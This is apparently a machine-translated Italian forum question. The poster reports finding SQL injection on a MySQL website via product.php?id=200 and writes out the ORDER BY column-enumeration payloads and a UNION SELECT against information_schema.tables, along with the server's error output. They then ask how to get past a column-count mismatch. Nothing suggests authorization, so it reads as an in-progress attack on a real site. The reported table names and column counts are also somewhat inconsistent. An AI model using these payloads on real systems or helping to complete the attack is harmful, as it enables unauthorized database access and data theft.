Una domanda di iniezione sql molto semplice qui, ho trovato uno SQLi su un sito web mysql con product.php?id=200 .
Per prima cosa ho stancato ORDER BY per calcolare il numero di colonna di quella tabella di product.php?id=200 order by 13
che risulta essere 12 colonne, l'errore mostra nell'ordine di 13 è
Error: SELECT * FROM 'category' WHERE is_active='1' AND id =200 order by 13
Unknown column '13' in 'order clause'
Tutto sembra a posto, quindi ho provato a capire i nomi delle tabelle,
product.php?id=200 union select table_name,2,3,4,5,6,7,8,9,10,11,12 from
information_schema.tables
e mostra
Error: SELECT * FROM 'products' WHERE is_active='1' AND id =200 union select
table_name,2,3,4,5,6,7,8,9,10,11,12 from information_schema.tables
The used SELECT statements have a different number of columns
Indipendentemente dal numero di numeri che inserisco nella query selezionata, mostra sempre lo stesso errore, presumo che nel backend ci siano alcune attività dinamiche, ma non sono sicuro di cosa, e come dovrei procedere, qualsiasi suggerimento per favore ? Grazie!